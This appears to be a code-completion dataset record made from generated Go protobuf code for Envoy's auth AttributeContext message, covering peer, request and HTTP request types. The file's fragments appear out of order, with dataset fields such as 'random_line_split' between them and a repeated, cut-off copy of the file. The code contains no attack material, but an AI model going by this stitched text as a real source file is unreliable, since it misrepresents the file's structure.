// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6] | type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identify of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
}
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil {
return m.Query
}
return ""
}
func (m *AttributeContext_HttpRequest) GetFragment() string {
if m != nil {
return m.Fragment
}
return ""
}
func (m *AttributeContext_HttpRequest) GetSize() int64 {
if m != nil {
return m.Size
}
return 0
}
func (m *AttributeContext_HttpRequest) GetProtocol() string {
if m != nil {
return m.Protocol
}
return ""
}
func (m *AttributeContext_HttpRequest) GetBody() string {
if m != nil {
return m.Body
}
return ""
}
func init() {
proto.RegisterType((*AttributeContext)(nil), "envoy.service.auth.v2.AttributeContext")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.ContextExtensionsEntry")
proto.RegisterType((*AttributeContext_Peer)(nil), "envoy.service.auth.v2.AttributeContext.Peer")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.Peer.LabelsEntry")
proto.RegisterType((*AttributeContext_Request)(nil), "envoy.service.auth.v2.AttributeContext.Request")
proto.RegisterType((*AttributeContext_HttpRequest)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest")
proto.RegisterMapType((map[string]string)(nil), "envoy.service.auth.v2.AttributeContext.HttpRequest.HeadersEntry")
}
func init() {
proto.RegisterFile("envoy/service/auth/v2/attribute_context.proto", fileDescriptor_a6030c9468e3591b)
}
var fileDescriptor_a6030c9468e3591b = []byte{
// 640 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x53, 0x4d, 0x6f, 0xd3, 0x4c,
0x10, 0x56, 0x3e, 0x9a, 0x34, 0x93, 0x57, 0x2f, 0x65, 0x45, 0x2b, 0xcb, 0x54, 0x6a, 0x04, 0x97,
0x1e, 0xc0, 0x96, 0x52, 0x0e, 0xa5, 0x87, 0x8a, 0x96, 0x16, 0x8a, 0x04, 0x28, 0xb2, 0x38, 0x71,
0xa9, 0x36, 0xf6, 0xb4, 0x5e, 0x11, 0x7b, 0xdd, 0xdd, 0x71, 0xd4, 0x70, 0x84, 0x5f, 0x82, 0xf8,
0xa3, 0x68, 0x3f, 0x5c, 0xa2, 0x92, 0x43, 0xdb, 0x93, 0x67, 0xc6, 0xcf, 0x3c, 0x3b, 0x33, 0xcf,
0x0c, 0xbc, 0xc4, 0x72, 0x2e, 0x17, 0xb1, 0x46, 0x35, 0x17, 0x29, 0xc6, 0xbc, 0xa6, 0x3c, 0x9e,
0x8f, 0x63, 0x4e, 0xa4, 0xc4, 0xb4, 0x26, 0x3c, 0x4f, 0x65, 0x49, 0x78, 0x4d, 0x51, 0xa5, 0x24,
0x49, 0xb6, 0x69, 0xe1, 0x91, 0x87, 0x47, 0x06, 0x1e, 0xcd, 0xc7, 0xe1, 0x8e, 0x63, 0xe1, 0x95,
0x30, 0xc9, 0xa9, 0x54, 0x18, 0xf3, 0x2c, 0x53, 0xa8, 0xb5, 0xcb, 0x0b, 0xb7, 0xff, 0x05, 0x4c,
0xb9, 0x46, 0xff, 0x77, 0xe7, 0x52, 0xca, 0xcb, 0x19, 0xc6, 0xd6, 0x9b, 0xd6, 0x17, 0x31, 0x89,
0x02, 0x35, 0xf1, 0xa2, 0x72, 0x80, 0x67, 0xbf, 0x00, 0x36, 0x8e, 0x9a, 0x92, 0xde, 0xba, 0x8a,
0xd8, 0x09, 0xf4, 0xb4, 0xac, 0x55, 0x8a, 0x41, 0x6b, 0xd4, 0xda, 0x1d, 0x8e, 0x5f, 0x44, 0x2b,
0x8b, 0x8b, 0x6e, 0x27, 0x46, 0x13, 0x44, 0x95, 0xf8, 0x5c, 0xf6, 0x19, 0x86, 0x19, 0x6a, 0x12,
0x25, 0x27, 0x21, 0xcb, 0xa0, 0xfd, 0x00, 0xaa, 0x65, 0x02, 0xf6, 0x01, 0xfa, 0x0a, 0xaf, 0x6a,
0xd4, 0x14, 0x74, 0x2d, 0x57, 0x7c, 0x57, 0xae, 0xc4, 0xa5, 0x25, 0x4d, 0x3e, 0x2b, 0x80, 0xf9,
0xe9, 0x9f, 0xe3, 0x35, 0x61, 0xa9, 0x85, 0x2c, 0x75, 0x00, 0xa3, 0xce, 0xee, 0x70, 0x7c, 0x78,
0x57, 0x56, 0xff, 0x3d, 0xbd, 0x21, 0x38, 0x2d, 0x49, 0x2d, 0x92, 0xc7, 0xe9, 0xed, 0x38, 0x7b,
0x07, 0x1b, 0x05, 0x12, 0xcf, 0x38, 0xf1, 0x46, 0xf5, 0x60, 0x68, 0x5b, 0x78, 0xea, 0x1f, 0xe3,
0x95, 0x30, 0x6f, 0x18, 0xf9, 0xa2, 0x4f, 0x1e, 0x9a, 0x3c, 0x6a, 0x92, 0xfc, 0x4b, 0xe1, 0xef,
0x36, 0x74, 0xcd, 0x5c, 0xd8, 0x2b, 0xe8, 0xfb, 0x2d, 0xf0, 0x0a, 0x85, 0x2b, 0x78, 0x8e, 0x1c,
0x22, 0x69, 0xa0, 0x2c, 0x80, 0xbe, 0x6f, 0xca, 0x8a, 0x31, 0x48, 0x1a, 0x97, 0x4d, 0xa0, 0x37,
0xe3, 0x53, 0x9c, 0xe9, 0xa0, 0x63, 0x67, 0xb0, 0x7f, 0x1f, 0x95, 0xa2, 0x8f, 0x36, 0xd5, 0x75,
0xef, 0x79, 0xd8, 0x36, 0x0c, 0x2a, 0x25, 0xca, 0x54, 0x54, 0x7c, 0x66, 0xe5, 0x1a, 0x24, 0x7f,
0x03, 0x6c, 0x04, 0xc3, 0x14, 0x15, 0x89, 0x0b, 0x91, 0x72, 0xc2, 0x60, 0xcd, 0xfe, 0x5f, 0x0e,
0x85, 0xaf, 0x61, 0xb8, 0x44, 0xcb, 0x36, 0xa0, 0xf3, 0x0d, 0x17, 0xb6, 0xd9, 0x41, 0x62, 0x4c,
0xf6, 0x04, 0xd6, 0xe6, 0x7c, 0x56, 0x37, 0xad, 0x38, 0xe7, 0xa0, 0xbd, 0xdf, 0x0a, 0x7f, 0xb4,
0xa0, 0xef, 0x15, 0x67, 0x11, 0x74, 0xcd, 0xc6, 0xdf, 0x4c, 0xc9, 0x9d, 0x43, 0xd4, 0x9c, 0x43,
0xf4, 0xa5, 0x39, 0x87, 0xc4, 0xe2, 0xd8, 0x7b, 0xe8, 0xe6, 0x44, 0x95, 0x5f, 0xd6, 0xbd, 0xbb,
0x8e, 0xe1, 0x8c, 0xa8, 0x6a, 0x96, 0xcc, 0x12, 0x84, 0x3f, 0x3b, 0x30, 0x5c, 0x8a, 0xb2, 0xff,
0xa1, 0x2d, 0x32, 0x5f, 0x7f, 0x5b, 0x64, 0x6c, 0x0b, 0x7a, 0x05, 0x52, 0x2e, 0x33, 0x5f, 0xbf,
0xf7, 0xd8, 0x57, 0xe8, 0xe7, 0xc8, 0x33, 0x54, 0x8d, 0x14, 0x6f, 0x1e, 0x50, 0x43, 0x74, 0xe6,
0x28, 0x9c, 0x24, 0x0d, 0x21, 0x63, 0xd0, 0xad, 0x38, 0xe5, 0x5e, 0x0e, 0x6b, 0x9b, 0x58, 0x2e,
0x35, 0x79, 0x09, 0xac, 0x6d, 0x6a, 0xd3, 0x69, 0x8e, 0x05, 0x06, 0x3d, 0x57, 0x9b, 0xf3, 0xcc,
0xc8, 0xaf, 0x6a, 0x54, 0x8b, 0xa0, 0xef, 0x46, 0x6e, 0x1d, 0x16, 0xc2, 0xfa, 0x85, 0xe2, 0x97,
0x05, 0x96, 0x14, 0xac, 0xdb, 0x1f, 0x37, 0xbe, 0x61, 0xd7, 0xe2, 0x3b, 0x06, 0x83, 0x51, 0x6b,
0xb7, 0x93, 0x58, 0xdb, 0xe0, 0xed, 0xf8, 0x53, 0x39, 0x0b, 0xc0, 0xe1, 0x1b, 0xdf, 0xe0, 0xa7,
0x32, 0x5b, 0xd8, 0xe3, 0x18, 0x24, 0xd6, 0x0e, 0x0f, 0xe0, 0xbf, 0xe5, 0x76, 0xee, 0xb5, 0x0a,
0x27, 0xb0, 0xb5, 0xfa, 0x4a, 0xef, 0xc3, 0x72, 0x7c, 0x08, 0xcf, 0x85, 0x74, 0x32, 0x54, 0x4a,
0x5e, 0x2f, 0x56, 0x2b, 0x72, 0xbc, 0x79, 0x5b, 0x92, 0x89, 0x69, 0x6b, 0xd2, 0x9a, 0xf6, 0x6c,
0x7f, 0x7b, 0x7f, 0x02, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xed, 0x07, 0x53, 0x12, 0x06, 0x00, 0x00,
} | random_line_split |
|
attribute_context.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: envoy/service/auth/v2/attribute_context.proto
package envoy_service_auth_v2
import (
fmt "fmt"
core "github.com/cilium/proxy/go/envoy/api/v2/core"
proto "github.com/golang/protobuf/proto"
timestamp "github.com/golang/protobuf/ptypes/timestamp"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// An attribute is a piece of metadata that describes an activity on a network.
// For example, the size of an HTTP request, or the status code of an HTTP response.
//
// Each attribute has a type and a name, which is logically defined as a proto message field
// of the `AttributeContext`. The `AttributeContext` is a collection of individual attributes
// supported by Envoy authorization system.
// [#comment: The following items are left out of this proto
// Request.Auth field for jwt tokens
// Request.Api for api management
// Origin peer that originated the request
// Caching Protocol
// request_context return values to inject back into the filter chain
// peer.claims -- from X.509 extensions
// Configuration
// - field mask to send
// - which return values from request_context are copied back
// - which return values are copied into request_headers]
// [#next-free-field: 12]
type AttributeContext struct {
// The source of a network activity, such as starting a TCP connection.
// In a multi hop network activity, the source represents the sender of the
// last hop.
Source *AttributeContext_Peer `protobuf:"bytes,1,opt,name=source,proto3" json:"source,omitempty"`
// The destination of a network activity, such as accepting a TCP connection.
// In a multi hop network activity, the destination represents the receiver of
// the last hop.
Destination *AttributeContext_Peer `protobuf:"bytes,2,opt,name=destination,proto3" json:"destination,omitempty"`
// Represents a network request, such as an HTTP request.
Request *AttributeContext_Request `protobuf:"bytes,4,opt,name=request,proto3" json:"request,omitempty"`
// This is analogous to http_request.headers, however these contents will not be sent to the
// upstream server. Context_extensions provide an extension mechanism for sending additional
// information to the auth server without modifying the proto definition. It maps to the
// internal opaque context in the filter chain.
ContextExtensions map[string]string `protobuf:"bytes,10,rep,name=context_extensions,json=contextExtensions,proto3" json:"context_extensions,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// Dynamic metadata associated with the request.
MetadataContext *core.Metadata `protobuf:"bytes,11,opt,name=metadata_context,json=metadataContext,proto3" json:"metadata_context,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext) Reset() { *m = AttributeContext{} }
func (m *AttributeContext) String() string { return proto.CompactTextString(m) }
func (*AttributeContext) ProtoMessage() {}
func (*AttributeContext) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0}
}
func (m *AttributeContext) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext.Unmarshal(m, b)
}
func (m *AttributeContext) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext.Marshal(b, m, deterministic)
}
func (m *AttributeContext) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext.Merge(m, src)
}
func (m *AttributeContext) XXX_Size() int {
return xxx_messageInfo_AttributeContext.Size(m)
}
func (m *AttributeContext) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext proto.InternalMessageInfo
func (m *AttributeContext) GetSource() *AttributeContext_Peer {
if m != nil {
return m.Source
}
return nil
}
func (m *AttributeContext) GetDestination() *AttributeContext_Peer {
if m != nil {
return m.Destination
}
return nil
}
func (m *AttributeContext) GetRequest() *AttributeContext_Request {
if m != nil {
return m.Request
}
return nil
}
func (m *AttributeContext) GetContextExtensions() map[string]string {
if m != nil {
return m.ContextExtensions
}
return nil
}
func (m *AttributeContext) GetMetadataContext() *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6]
type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identify of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
}
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
